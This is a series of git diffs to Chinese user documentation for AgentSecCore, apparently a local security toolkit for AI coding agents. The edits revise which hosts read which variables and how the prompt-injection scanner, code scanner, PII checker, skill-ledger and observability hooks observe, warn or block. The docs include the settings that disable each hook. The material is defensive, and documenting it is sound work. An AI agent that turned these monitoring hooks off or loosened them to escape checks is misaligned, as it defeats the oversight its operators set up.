 | [Code Scanner Hook 配置](agent-security/agent-sec-core/code-scanner.md) | agent-sec-core | 各 Agent 的 hook 模式、环境变量与 fallback 行为 |
+| [Prompt Scanner](agent-security/agent-sec-core/prompt-scanner.md) | agent-sec-core | 提示词注入 / 越狱检测、模式与 verdict |
 | [PII 检测](agent-security/agent-sec-core/pii-checker.md) | agent-sec-core | 个人数据/凭证检测与脱敏 |
 | [Skill Ledger 用户指南](agent-security/agent-sec-core/skill-ledger.md) | agent-sec-core | 技能账本完整性链与签名工作流 |
 | [OpenClaw 兼容部署与升级](agent-security/agent-sec-core/openclaw-deploy.md) | agent-sec-core | OpenClaw 插件部署与升级指南 |

--- a/docs/user-guide/zh/agent-security/agent-sec-core/QUICKSTART.md
+++ b/docs/user-guide/zh/agent-security/agent-sec-core/QUICKSTART.md
@@ -129,13 +129,15 @@ agent-sec-cli scan-prompt warmup
 | 环境变量 | 默认值 | 读取该变量的宿主 | 行为 |
 |----------|--------|------------------|------|
 | `PROMPT_SCANNER_HOOK_ENABLED` | `true` | 全部六个 | 设为 `false` 时在读取输入前跳过 hook |
-| `PROMPT_SCANNER_MODE` | `observe` | Qoder、Codex、Qwen Code | `observe` 静默审计；`warn` 告警；`ask`/`block` 执行或 fallback 为 `warn`；`deny` 等价于 `block` |
+| `PROMPT_SCANNER_MODE` | `observe` | Qoder、Codex、Qwen Code | `observe` 静默审计；`deny` 会在 prompt scanner 返回 `warn` 或 `deny` finding 时阻断。`ask` 和 `block` 不是 prompt scanner 的有效模式。 |
 | `PROMPT_SCANNER_SCAN_MODE` | `standard` | 全部六个 | 扫描强度：`fast` / `standard` / `strict` |
 | `PROMPT_SCANNER_TIMEOUT` | `10` | Qoder、Codex、Qwen Code | Scanner 超时秒数 |
 
 cosh、Hermes 和 OpenClaw 不读取 `PROMPT_SCANNER_MODE` 与 `PROMPT_SCANNER_TIMEOUT`。
 在这些宿主上，prompt 策略来自原生配置 —— OpenClaw 使用 `promptScanBlock`；Hermes 的
-prompt-scan capability 本身就是非阻断设计，没有阻断开关。完整跨宿主矩阵见
+prompt-scan capability 本身就是非阻断设计，没有阻断开关。Qoder、Codex 和 Qwen Code
+需要使用 `PROMPT_SCANNER_MODE=deny` 阻断 prompt scanner finding；这些 prompt hook
+会拒绝或忽略未知的 `block` 模式。完整跨宿主矩阵见
 [Agent Hook 环境变量](#agent-hook-环境变量)。
 
 完整 CLI 选项、verdict 语义和 Security Event 说明参见 [Prompt Scanner 用户使用指南](prompt-scanner.md)。
@@ -245,7 +247,7 @@ stdin 传给 `scan-pii`，告警只使用脱敏 evidence。
 | `PII_CHECKER_MODE` | `observe` | 全部六个 | `observe` 静默审计；`warn` 告警；`ask`/`block` 按宿主能力执行或 fallback；`debug` 等价于 `observe`，`deny` 等价于 `block` |
 | `PII_CHECKER_TIMEOUT` | `5` | Qoder、Codex、Qwen Code | scanner 超时秒数；Qwen Code 上限为 8 秒 |
 | `PII_CHECKER_INCLUDE_LOW_CONFIDENCE` | `false` | Qoder、Qwen Code | 开启后传递 `--include-low-confidence` |
-| `PII_CHECKER_ENABLED` | - | 仅 Qwen Code | 旧 enabled 变量；`PII_CHECKER_HOOK_ENABLED` 缺失时生效 |
+| `PII_CHECKER_ENABLED` | - | 仅 Qwen Code | 旧 enabled 变量；仅在 `PII_CHECKER_HOOK_ENABLED` 缺失时生效 |
 
 #### Qwen Code 阻断边界
 
@@ -523,6 +525,8 @@ policy = "ask"          # observe | warn | ask（默认）| block
 
 `timeout` 是 Hermes 每个 capability 的必填项。`prompt-scan-user-input` 本身是非阻断
 设计：它通过 `transform_llm_output` 告警，没有 `enable_block` 或 `policy` 字段。
+这里的 `timeout = 15` 是 Hermes capability 配置，不是 `PROMPT_SCANNER_TIMEOUT`；
+Hermes 不读取 prompt scanner timeout 环境变量。
 
 ### Qwen Code
 
@@ -591,11 +595,12 @@ adapter 会通过内置的 `agent-sec` marketplace 把 `agent-sec-core` 注册�
 | `PostToolUse` | PII checker、observability |
 | `Stop` | observability |
 
-Codex 的 `CODE_SCANNER_MODE` 支持 `observe` 和 `block`，`ask` 被视为未设置。在启动
-Codex 的环境中设置策略：
+Codex 的 `CODE_SCANNER_MODE` 支持 `observe` 和 `block`，`ask` 被视为未设置。
+prompt scanner 是独立模式，只接受 `observe` 或 `deny`；如需阻断 prompt，请使用
+`PROMPT_SCANNER_MODE=deny`。在启动 Codex 的环境中设置策略：
 
 ```bash
-CODE_SCANNER_MODE=block PROMPT_SCANNER_MODE=block PII_CHECKER_MODE=block codex
+CODE_SCANNER_MODE=block PROMPT_SCANNER_MODE=deny PII_CHECKER_MODE=block codex
 ```
 
 ### Qoder
@@ -622,10 +627,11 @@ Skill Ledger hook 先从 `~/.qoder/skills/` 解析用户级 Skill，再从
 按 `SKILL_LEDGER_MODE`（默认 `ask`）处理结果。每次检查都会把 Qoder trace 标识写入
 安全审计日志。
 
-Qoder 的 `CODE_SCANNER_MODE` 支持 `observe`、`ask` 和 `block`：
+Qoder 的 `CODE_SCANNER_MODE` 支持 `observe`、`ask` 和 `block`。prompt scanner 是独立
+模式，只接受 `observe` 或 `deny`；如需阻断 prompt，请使用 `PROMPT_SCANNER_MODE=deny`：
 
 ```bash
-CODE_SCANNER_MODE=ask SKILL_LEDGER_MODE=block qoder
+CODE_SCANNER_MODE=ask PROMPT_SCANNER_MODE=deny SKILL_LEDGER_MODE=block qoder
 ```
 
 ### Copilot Shell（cosh）

--- a/docs/user-guide/zh/agent-security/agent-sec-core/QUICKSTART.md
+++ b/docs/user-guide/zh/agent-security/agent-sec-core/QUICKSTART.md
@@ -1,5 +1,7 @@
 # AgentSecCore
 
+[English](../../../en/agent-security/agent-sec-core/QUICKSTART.md)
+
 AgentSecCore 是面向 AI Agent 的全本地安全内核，零 Token 消耗。提供纵深防御体系：提示词注入检测、代码扫描、技能完整性验证、敏感信息检测、系统加固和沙箱隔离。
 
 ## 概述
@@ -122,15 +124,19 @@ agent-sec-cli scan-prompt warmup
 
 #### 宿主 Hook Policy
 
-设置 `PROMPT_SCANNER_HOOK_ENABLED=false` 可完全跳过 prompt scanner hook。启用时，以下环境变量覆盖
-capability 配置：
+设置 `PROMPT_SCANNER_HOOK_ENABLED=false` 可完全跳过 prompt scanner hook。
 
-| 环境变量 | 默认值 | 行为 |
-|----------|--------|------|
-| `PROMPT_SCANNER_HOOK_ENABLED` | `true` | 设为 `false` 时在读取输入前跳过 hook |
-| `PROMPT_SCANNER_MODE` | `observe` | `observe` 静默审计；`warn` 告警；`ask`/`block` 执行或 fallback 为 `warn`；`deny` 等价于 `block` |
-| `PROMPT_SCANNER_SCAN_MODE` | `standard` | 扫描强度：`fast` / `standard` / `strict` |
-| `PROMPT_SCANNER_TIMEOUT` | `10` | Scanner 超时秒数 |
+| 环境变量 | 默认值 | 读取该变量的宿主 | 行为 |
+|----------|--------|------------------|------|
+| `PROMPT_SCANNER_HOOK_ENABLED` | `true` | 全部六个 | 设为 `false` 时在读取输入前跳过 hook |
+| `PROMPT_SCANNER_MODE` | `observe` | Qoder、Codex、Qwen Code | `observe` 静默审计；`warn` 告警；`ask`/`block` 执行或 fallback 为 `warn`；`deny` 等价于 `block` |
+| `PROMPT_SCANNER_SCAN_MODE` | `standard` | 全部六个 | 扫描强度：`fast` / `standard` / `strict` |
+| `PROMPT_SCANNER_TIMEOUT` | `10` | Qoder、Codex、Qwen Code | Scanner 超时秒数 |
+
+cosh、Hermes 和 OpenClaw 不读取 `PROMPT_SCANNER_MODE` 与 `PROMPT_SCANNER_TIMEOUT`。
+在这些宿主上，prompt 策略来自原生配置 —— OpenClaw 使用 `promptScanBlock`；Hermes 的
+prompt-scan capability 本身就是非阻断设计，没有阻断开关。完整跨宿主矩阵见
+[Agent Hook 环境变量](#agent-hook-环境变量)。
 
 完整 CLI 选项、verdict 语义和 Security Event 说明参见 [Prompt Scanner 用户使用指南](prompt-scanner.md)。
 
@@ -170,6 +176,9 @@ OS 级技能完整性追踪，Ed25519 签名 + 只追加版本链。
 # 初始化密钥并基线扫描
 agent-sec-cli skill-ledger init
 
+# 只读分析当前内容，不创建或更新账本状态
+agent-sec-cli skill-ledger analyze /path/to/skill --format json
+
 # 检查完整性（不修改）
 agent-sec-cli skill-ledger check /path/to/skill
 agent-sec-cli skill-ledger check --all
@@ -202,6 +211,8 @@ agent-sec-cli skill-ledger show /path/to/skill
 agent-sec-cli skill-ledger export /path/to/skill --output /tmp/export/
 ```
 
+签名密钥位于 `~/.local/share/agent-sec/skill-ledger/`。
+
 ### PII Checker（敏感信息检测）
 
 检测文本输入中的个人信息和凭据。
@@ -223,25 +234,28 @@ agent-sec-cli scan-pii --text "card 4111111111111111" --redact-output
 agent-sec-cli scan-pii --text "some text" --include-low-confidence
 ```
 
-#### Qwen Code 集成
+#### 宿主 Hook Policy
+
+六个宿主都会执行 PII 检测。默认启用 observe-only 和 fail-open；原始扫描内容只通过
+stdin 传给 `scan-pii`，告警只使用脱敏 evidence。
+
+| 环境变量 | 默认值 | 读取该变量的宿主 | 行为 |
+|----------|--------|------------------|------|
+| `PII_CHECKER_HOOK_ENABLED` | `true` | 全部六个 | 设为 `false` 时在读取输入前跳过 PII hook |
+| `PII_CHECKER_MODE` | `observe` | 全部六个 | `observe` 静默审计；`warn` 告警；`ask`/`block` 按宿主能力执行或 fallback；`debug` 等价于 `observe`，`deny` 等价于 `block` |
+| `PII_CHECKER_TIMEOUT` | `5` | Qoder、Codex、Qwen Code | scanner 超时秒数；Qwen Code 上限为 8 秒 |
+| `PII_CHECKER_INCLUDE_LOW_CONFIDENCE` | `false` | Qoder、Qwen Code | 开启后传递 `--include-low-confidence` |
+| `PII_CHECKER_ENABLED` | - | 仅 Qwen Code | 旧 enabled 变量；`PII_CHECKER_HOOK_ENABLED` 缺失时生效 |
+
+#### Qwen Code 阻断边界
 
 Qwen Code extension 会扫描用户输入、工具输入、成功及失败的工具输出和最终模型输出。
-默认启用 observe-only 和 fail-open；原始扫描内容只通过 stdin 传给 `scan-pii`，告警只使用
-脱敏 evidence。
 
 ```bash
 # 启用扩展，再以阻断模式启动 Qwen Code
 anolisa adapter enable sec-core qwencode
 PII_CHECKER_MODE=block qwen
 ```
-
-| 环境变量 | 默认值 | 行为 |
-|----------|--------|------|
-| `PII_CHECKER_HOOK_ENABLED` | `true` | 设为 `false` 时在读取输入前跳过 PII hook |
-| `PII_CHECKER_MODE` | `observe` | `observe` 静默审计；`warn` 告警；`ask`/`block` 按宿主能力执行或 fallback；`debug` 等价于 `observe`，`deny` 等价于 `block` |
-| `PII_CHECKER_ENABLED` | - | 仅兼容 Qwen 旧 enabled 变量；新开关缺失时生效 |
-| `PII_CHECKER_INCLUDE_LOW_CONFIDENCE` | `false` | 开启后传递 `--include-low-confidence` |
-| `PII_CHECKER_TIMEOUT` | `5` | scanner 超时秒数，最大 8 秒 |
 
 用户输入和工具输入可在执行前阻断。工具成功执行后才触发 `PostToolUse`，此时副作用已经
 发生；Qwen Code 0.19.9 会消费 `continue:false`，在下游正常处理前把成功结果转为
@@ -275,10 +289,9 @@ agent-sec-cli harden --downstream-help
 
 交互式事件审阅工具，用于审计 Agent 行为。
 
-OpenClaw、Hermes、cosh、Qwen Code、Qoder 和 Codex 集成默认启用 Observability hook。
-若需停止 hook 记录，请在启动宿主前设置 `OBSERVABILITY_HOOK_ENABLED=false`；修改后需重启
-宿主进程。该变量仅接受 `true` / `false`（忽略大小写和首尾空白）；未设置或值无效时保持
-默认开启。
+六个集成默认启用 Observability hook。若需停止 hook 记录，请在启动宿主前设置
+`OBSERVABILITY_HOOK_ENABLED=false`；修改后需重启宿主进程。该变量仅接受
+`true` / `false`（忽略大小写和首尾空白）；未设置或值无效时保持默认开启。
 
 `OBSERVABILITY_TIMEOUT` 控制每次本地 PII 脱敏和 Observability 数据写入 CLI 调用的超时秒数。
 默认值为 `5`；未设置、空值、非法值或非正数同样使用 `5`。所有集成都会将大于 `5` 的值
@@ -369,6 +382,48 @@ agent-sec-cli capabilities --agent qwen --capability pii-check --output json
 - 不包含：OpenClaw、Hermes 或其他 Agent 配置文件；Agent home 目录；实时 hook 加载或注册状态。
 - 已知偏移：从不同 shell/container/service 运行命令，或真实 Agent 使用不同配置时，输出可能与真实运行行为不同。
 
+## Agent Hook 环境变量
+
+每个宿主都会读取 `<CAPABILITY>_HOOK_ENABLED`（`true` / `false`，忽略大小写和首尾
+空白）。未设置或值无效时保持 hook 开启。对于使用 shared hook policy parser 的
+capability，`<CAPABILITY>_MODE` 决定 finding 的处置方式；`debug` 是 `observe`
+的别名，`deny` 是 `block` 的别名。Prompt Scanner 更窄：`PROMPT_SCANNER_MODE`
+只接受 `observe` 和 `deny`。宿主在加载插件时读取这些变量，修改后需重启宿主进程。
+
+**并非每个变量都被所有宿主消费。** 下表反映 adapter 代码实际读取的情况
+（✓ = 该宿主会读取，✗ = 不读取）：
+
+| 变量 | 默认值 | cosh | Qoder | Codex | Qwen Code | Hermes | OpenClaw |
+|------|--------|------|-------|-------|-----------|--------|----------|
+| `CODE_SCANNER_HOOK_ENABLED` | `true` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `CODE_SCANNER_MODE` | `observe`（cosh 为 `ask`） | ✓（仅 `ask`） | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `CODE_SCANNER_TIMEOUT` | `10` | ✗ | ✓ | ✓ | ✓ | ✗ | ✗ |
+| `PROMPT_SCANNER_HOOK_ENABLED` | `true` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `PROMPT_SCANNER_MODE` | `observe` | ✗ | ✓ | ✓ | ✓ | ✗ | ✗ |
+| `PROMPT_SCANNER_SCAN_MODE` | `standard` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `PROMPT_SCANNER_TIMEOUT` | `10` | ✗ | ✓ | ✓ | ✓ | ✗ | ✗ |
+| `PII_CHECKER_HOOK_ENABLED` | `true` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `PII_CHECKER_MODE` | `observe` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `PII_CHECKER_TIMEOUT` | `5` | ✗ | ✓ | ✓ | ✓ | ✗ | ✗ |
+| `PII_CHECKER_INCLUDE_LOW_CONFIDENCE` | `false` | ✗ | ✓ | ✗ | ✓ | ✗ | ✗ |
+| `PII_CHECKER_ENABLED`（旧开关） | — | ✗ | ✗ | ✗ | ✓ | ✗ | ✗ |
+| `SKILL_LEDGER_HOOK_ENABLED` | `true` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `SKILL_LEDGER_MODE` | `ask` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `SKILL_LEDGER_TIMEOUT` | `5` | ✗ | ✓ | ✓ | ✗ | ✗ | ✗ |
+| `OBSERVABILITY_HOOK_ENABLED` | `true` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+
+若某宿主不读取某个变量，则由该宿主的原生配置决定行为。例如 OpenClaw 的 prompt
+策略来自 `promptScanBlock`、code-scan 策略来自 `codeScanRequireApproval`；Hermes 则
+对 `code-scan` 使用 `enable_block`、对 `pii-scan-user-input` 使用 `policy`。Hermes 的
+`prompt-scan-user-input` capability 根本没有阻断开关。
+
+对于 Hermes 和 OpenClaw，capability 的 `enabled` 配置仍是独立开关。任一开关关闭都会
+停用该 hook；把 `<CAPABILITY>_HOOK_ENABLED` 设为 `true`，不会重新启用已在插件配置中
+关闭的 capability。`PII_CHECKER_ENABLED` 只是 Qwen Code 旧开关 fallback：仅当
+`PII_CHECKER_HOOK_ENABLED` 缺失时读取，其它宿主完全忽略。
+
+各宿主 Code Scanner 的 mode 语义与 fallback 行为见
+[Code Scanner Hook 配置](code-scanner.md)。
 
 ## Agent 框架集成
 
@@ -447,17 +502,27 @@ enable_block = false    # false=观察模式, true=阻断
 [capabilities.pii-scan-user-input]
 enabled = true
 timeout = 10
+policy = "observe"      # observe（默认）| warn | ask | block
+include_low_confidence = false
+warning_ttl_seconds = 300
 
 [capabilities.prompt-scan-user-input]
 enabled = true
-timeout = 10
-enable_block = false    # false=观察模式, true=阻断
+timeout = 15
+warning_ttl_seconds = 300
+
+[capabilities.observability]
+enabled = true
+timeout = 5
 
 [capabilities.skill-ledger]
 enabled = true
 timeout = 5
 policy = "ask"          # observe | warn | ask（默认）| block
 ```
+
+`timeout` 是 Hermes 每个 capability 的必填项。`prompt-scan-user-input` 本身是非阻断
+设计：它通过 `transform_llm_output` 告警，没有 `enable_block` 或 `policy` 字段。
 
 ### Qwen Code
 
@@ -507,6 +572,61 @@ hook 遵循现有 Skill Ledger exposure message，包括已有的 `decide` 决�
 `.agents/skills`、bundled Skill，以及目标离开对应 `.qwen/skills` 根目录的符号链接。
 CLI 或密钥缺失、初始化失败、路径或 settings 不可访问或歧义、超时及输出异常都会
 记录诊断并 fail-open。本集成不提供启动预检、后台扫描、缓存或配置自动修复。
+
+### Codex
+
+通过 ANOLISA 启用 adapter。
+
+```bash
+anolisa adapter enable sec-core codex
+```
+
+adapter 会通过内置的 `agent-sec` marketplace 把 `agent-sec-core` 注册为 Codex 插件，
+因此启用前 `codex` 和 `agent-sec-cli` 都需在 `PATH` 中。已注册的 hook：
+
+| Codex hook | 检查项 |
+|------------|--------|
+| `UserPromptSubmit` | prompt scanner、PII checker、Skill Ledger、observability |
+| `PreToolUse` | code scanner（`Bash` matcher）、PII checker、observability |
+| `PostToolUse` | PII checker、observability |
+| `Stop` | observability |
+
+Codex 的 `CODE_SCANNER_MODE` 支持 `observe` 和 `block`，`ask` 被视为未设置。在启动
+Codex 的环境中设置策略：
+
+```bash
+CODE_SCANNER_MODE=block PROMPT_SCANNER_MODE=block PII_CHECKER_MODE=block codex
+```
+
+### Qoder
+
+通过 ANOLISA 启用 adapter。
+
+```bash
+anolisa adapter enable sec-core qoder
+```
+
+adapter 会通过 `qodercli plugins install` 安装 Qoder CLI 插件。完成后请重启 Qoder CLI
+或执行 `/plugins reload`。已注册的 hook：
+
+| Qoder hook | 检查项 |
+|------------|--------|
+| `UserPromptSubmit` | observability、PII checker、prompt scanner |
+| `PreToolUse` | observability、Skill Ledger（`Skill` matcher）、code scanner（`Bash` matcher）、PII checker |
+| `PostToolUse` | observability、PII checker |
+| `PostToolUseFailure` | observability |
+| `Stop` / `StopFailure` | observability |
+
+Skill Ledger hook 先从 `~/.qoder/skills/` 解析用户级 Skill，再从
+`<cwd>/.qoder/skills/` 解析项目级 Skill，随后执行只读的 `skill-ledger check`，并
+按 `SKILL_LEDGER_MODE`（默认 `ask`）处理结果。每次检查都会把 Qoder trace 标识写入
+安全审计日志。
+
+Qoder 的 `CODE_SCANNER_MODE` 支持 `observe`、`ask` 和 `block`：
+
+```bash
+CODE_SCANNER_MODE=ask SKILL_LEDGER_MODE=block qoder
+```
 
 ### Copilot Shell（cosh）
 

--- a/docs/user-guide/zh/agent-security/agent-sec-core/QUICKSTART.md
+++ b/docs/user-guide/zh/agent-security/agent-sec-core/QUICKSTART.md
@@ -413,6 +413,10 @@ capability，`<CAPABILITY>_MODE` 决定 finding 的处置方式；`debug` 是 `o
 | `SKILL_LEDGER_MODE` | `ask` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
 | `SKILL_LEDGER_TIMEOUT` | `5` | ✗ | ✓ | ✓ | ✗ | ✗ | ✗ |
 | `OBSERVABILITY_HOOK_ENABLED` | `true` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `OBSERVABILITY_TIMEOUT` | `5` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+
+`OBSERVABILITY_TIMEOUT` 未设置、为空、非法或非正数时使用 `5` 秒；所有集成都会将
+大于 `5` 的值封顶为 `5`。
 
 若某宿主不读取某个变量，则由该宿主的原生配置决定行为。例如 OpenClaw 的 prompt
 策略来自 `promptScanBlock`、code-scan 策略来自 `codeScanRequireApproval`；Hermes 则
@@ -660,7 +664,9 @@ A: `agent-sec-cli harden` 是 ANOLISA 统一入口，底层调用 `loongshield s
 
 **Q: 如何更新 Prompt Scanner 的 ML 模型？**
 
-A: 重新执行 `agent-sec-cli scan-prompt warmup`，它会下载最新模型。
+A: 执行 `ollama pull modelscope.cn/ANOLISA/Qwen3Guard-Gen-0.6B-GGUF` 拉取当前模型，
+再执行 `agent-sec-cli scan-prompt warmup` 验证 Ollama 能否提供该模型。`warmup` 不会
+自动下载模型。
 
 **Q: Skill Ledger 出现 `tampered` 怎么办？**
 

--- a/docs/user-guide/zh/agent-security/agent-sec-core/QUICKSTART.md
+++ b/docs/user-guide/zh/agent-security/agent-sec-core/QUICKSTART.md
@@ -296,8 +296,9 @@ agent-sec-cli harden --downstream-help
 `true` / `false`（忽略大小写和首尾空白）；未设置或值无效时保持默认开启。
 
 `OBSERVABILITY_TIMEOUT` 控制每次本地 PII 脱敏和 Observability 数据写入 CLI 调用的超时秒数。
-默认值为 `5`；未设置、空值、非法值或非正数同样使用 `5`。所有集成都会将大于 `5` 的值
-封顶为 `5`。
+其余五个非 Hermes 集成默认使用 `5`；未设置、为空、非法或非正数时也使用 `5`。
+Hermes 则回退到 Observability capability 的 `timeout`，并将其封顶为 `5`；有效环境变量
+大于 `5` 时，所有集成都封顶为 `5`。
 
 对于 OpenClaw 和 Hermes，原有 Observability capability 的 `enabled` 配置仍是独立开关。
 任一开关关闭都会停止记录；`OBSERVABILITY_HOOK_ENABLED=true` 不会覆盖插件配置中已关闭的
@@ -415,8 +416,10 @@ capability，`<CAPABILITY>_MODE` 决定 finding 的处置方式；`debug` 是 `o
 | `OBSERVABILITY_HOOK_ENABLED` | `true` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
 | `OBSERVABILITY_TIMEOUT` | `5` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
 
-`OBSERVABILITY_TIMEOUT` 未设置、为空、非法或非正数时使用 `5` 秒；所有集成都会将
-大于 `5` 的值封顶为 `5`。
+矩阵中的默认值 `5` 与其余五个非 Hermes 集成及 Hermes 随附配置一致。对于 Hermes，
+`OBSERVABILITY_TIMEOUT` 未设置、为空、非法或非正数时，会回退到 Observability capability
+的 `timeout` 并封顶为 `5`，因此更低的 capability 配置值仍然生效。有效环境变量大于 `5`
+时，所有集成都封顶为 `5`。
 
 若某宿主不读取某个变量，则由该宿主的原生配置决定行为。例如 OpenClaw 的 prompt
 策略来自 `promptScanBlock`、code-scan 策略来自 `codeScanRequireApproval`；Hermes 则

--- a/docs/user-guide/zh/agent-security/agent-sec-core/openclaw-deploy.md
+++ b/docs/user-guide/zh/agent-security/agent-sec-core/openclaw-deploy.md
@@ -163,15 +163,16 @@ openclaw config get plugins.entries.agent-sec.hooks.allowConversationAccess
 openclaw config set plugins.entries.agent-sec.config.promptScanBlock true
 ```
 
-你也可以通过环境变量在部署层覆盖 prompt scanner 行为，这些变量优先于 OpenClaw capability
-配置：
+你也可以通过以下环境变量在部署层影响 prompt scanner 行为。
+`PROMPT_SCANNER_HOOK_ENABLED=false` 无论插件配置如何都会跳过 hook 注册：
 
 | 环境变量 | 默认值 | 行为 |
 |----------|--------|------|
 | `PROMPT_SCANNER_HOOK_ENABLED` | `true` | 设为 `false` 时完全跳过 prompt-scan hook 注册 |
-| `PROMPT_SCANNER_MODE` | `observe` | 策略模式：`observe` / `warn` / `ask` / `block`；`deny` 等价于 `block` |
 | `PROMPT_SCANNER_SCAN_MODE` | `standard` | 传给 `scan-prompt` 的扫描强度：`fast` / `standard` / `strict` |
-| `PROMPT_SCANNER_TIMEOUT` | `10` | Scanner 超时秒数 |
+
+OpenClaw 插件不读取 `PROMPT_SCANNER_MODE` 和 `PROMPT_SCANNER_TIMEOUT`。OpenClaw 上的
+prompt 策略由上方的 `promptScanBlock` 决定，scanner 超时固定为 10 秒。
 
 修改这些变量后需重启 OpenClaw gateway。
 

--- a/docs/user-guide/zh/agent-security/agent-sec-core/pii-checker.md
+++ b/docs/user-guide/zh/agent-security/agent-sec-core/pii-checker.md
@@ -76,6 +76,18 @@ verdict 和 finding schema；宿主只观察 finding 还是阻断操作，由该
 配置。`debug` 映射为 `observe`，`deny` 映射为 `block`。仅 Qwen Code 在未设置
 `PII_CHECKER_HOOK_ENABLED` 时额外兼容旧开关 `PII_CHECKER_ENABLED`。
 
+`PII_CHECKER_HOOK_ENABLED` 和 `PII_CHECKER_MODE` 被全部六个宿主读取。另有两个变量只被部分
+宿主读取：
+
+| 环境变量 | 默认值 | 读取该变量的宿主 |
+|----------|--------|------------------|
+| `PII_CHECKER_TIMEOUT` | `5` | Qoder、Codex、Qwen Code（Qwen Code 上限为 8 秒） |
+| `PII_CHECKER_INCLUDE_LOW_CONFIDENCE` | `false` | Qoder、Qwen Code |
+
+cosh、Hermes 和 OpenClaw 不读取这两个环境变量。但 Hermes 和 OpenClaw 仍可通过 capability
+配置支持这两项 —— Hermes 使用 `timeout` 和 `include_low_confidence`，OpenClaw 使用
+`piiIncludeLowConfidence`；cosh 使用固定超时，且从不请求低置信度 finding。
+
 宿主 Agent 在加载插件时读取这些变量。修改后需重启承载该 hook 的 Agent 进程；
 hook 和 agent-sec-core 并不是需要单独重启的 policy 服务。
 

--- a/docs/user-guide/zh/agent-security/agent-sec-core/pii-checker.md
+++ b/docs/user-guide/zh/agent-security/agent-sec-core/pii-checker.md
@@ -84,9 +84,10 @@ verdict 和 finding schema；宿主只观察 finding 还是阻断操作，由该
 | `PII_CHECKER_TIMEOUT` | `5` | Qoder、Codex、Qwen Code（Qwen Code 上限为 8 秒） |
 | `PII_CHECKER_INCLUDE_LOW_CONFIDENCE` | `false` | Qoder、Qwen Code |
 
-cosh、Hermes 和 OpenClaw 不读取这两个环境变量。但 Hermes 和 OpenClaw 仍可通过 capability
-配置支持这两项 —— Hermes 使用 `timeout` 和 `include_low_confidence`，OpenClaw 使用
-`piiIncludeLowConfidence`；cosh 使用固定超时，且从不请求低置信度 finding。
+cosh、Hermes 和 OpenClaw 不读取这两个环境变量。Hermes 可通过 capability 配置同时支持
+这两项（`timeout` 和 `include_low_confidence`）。OpenClaw 只支持
+`piiIncludeLowConfidence`；PII scanner CLI 超时固定为 10 秒。cosh 使用固定超时，且从不
+请求低置信度 finding。
 
 宿主 Agent 在加载插件时读取这些变量。修改后需重启承载该 hook 的 Agent 进程；
 hook 和 agent-sec-core 并不是需要单独重启的 policy 服务。

--- a/docs/user-guide/zh/agent-security/agent-sec-core/prompt-scanner.md
+++ b/docs/user-guide/zh/agent-security/agent-sec-core/prompt-scanner.md
@@ -61,15 +61,20 @@ Scanner 将各层结果聚合为一个 verdict：
 
 设置 `PROMPT_SCANNER_HOOK_ENABLED=false` 可完全跳过宿主 prompt scanner hook。启用时，以下环境变量控制部署级行为：
 
-| 环境变量 | 默认值 | 行为 |
-|----------|--------|------|
-| `PROMPT_SCANNER_HOOK_ENABLED` | `true` | 设为 `false` 时在读取输入前跳过 hook |
-| `PROMPT_SCANNER_MODE` | `observe` | `observe` 静默审计；`warn` 告警；`ask`/`block` 按宿主能力执行或 fallback 为 `warn`；`deny` 等价于 `block` |
-| `PROMPT_SCANNER_SCAN_MODE` | `standard` | 传给 `scan-prompt` 的扫描强度：`fast` / `standard` / `strict` |
-| `PROMPT_SCANNER_TIMEOUT` | `10` | Scanner 超时秒数 |
+| 环境变量 | 默认值 | 读取该变量的宿主 | 行为 |
+|----------|--------|------------------|------|
+| `PROMPT_SCANNER_HOOK_ENABLED` | `true` | 全部六个 | 设为 `false` 时在读取输入前跳过 hook |
+| `PROMPT_SCANNER_MODE` | `observe` | Qoder、Codex、Qwen Code | `observe` 静默审计；`warn` 告警；`ask`/`block` 按宿主能力执行或 fallback 为 `warn`；`deny` 等价于 `block` |
+| `PROMPT_SCANNER_SCAN_MODE` | `standard` | 全部六个 | 传给 `scan-prompt` 的扫描强度：`fast` / `standard` / `strict` |
+| `PROMPT_SCANNER_TIMEOUT` | `10` | Qoder、Codex、Qwen Code | Scanner 超时秒数 |
 
-环境变量优先于 Hermes/OpenClaw capability 配置。宿主 Agent 在加载插件时读取这些变量，修改后需重启承载该
-hook 的 Agent 进程。
+cosh、Hermes 和 OpenClaw 只读取 `PROMPT_SCANNER_HOOK_ENABLED` 和 `PROMPT_SCANNER_SCAN_MODE`，
+在这些宿主上设置 `PROMPT_SCANNER_MODE` 或 `PROMPT_SCANNER_TIMEOUT` 不会生效。OpenClaw 的阻断
+行为由 `promptScanBlock` 决定，scanner 超时固定为 10 秒；Hermes 的 `prompt-scan-user-input`
+capability 本身是非阻断设计，没有阻断开关；cosh 也没有 prompt 策略开关。
+
+对于确实会读取的环境变量，其优先于对应的 Hermes/OpenClaw capability 配置。宿主 Agent 在
+加载插件时读取这些变量，修改后需重启承载该 hook 的 Agent 进程。
 
 Scanner verdict `deny` 描述扫描风险；hook policy `block` 决定当前 adapter 是否执行阻断。
 

--- a/docs/user-guide/zh/agent-security/agent-sec-core/prompt-scanner.md
+++ b/docs/user-guide/zh/agent-security/agent-sec-core/prompt-scanner.md
@@ -64,19 +64,21 @@ Scanner 将各层结果聚合为一个 verdict：
 | 环境变量 | 默认值 | 读取该变量的宿主 | 行为 |
 |----------|--------|------------------|------|
 | `PROMPT_SCANNER_HOOK_ENABLED` | `true` | 全部六个 | 设为 `false` 时在读取输入前跳过 hook |
-| `PROMPT_SCANNER_MODE` | `observe` | Qoder、Codex、Qwen Code | `observe` 静默审计；`warn` 告警；`ask`/`block` 按宿主能力执行或 fallback 为 `warn`；`deny` 等价于 `block` |
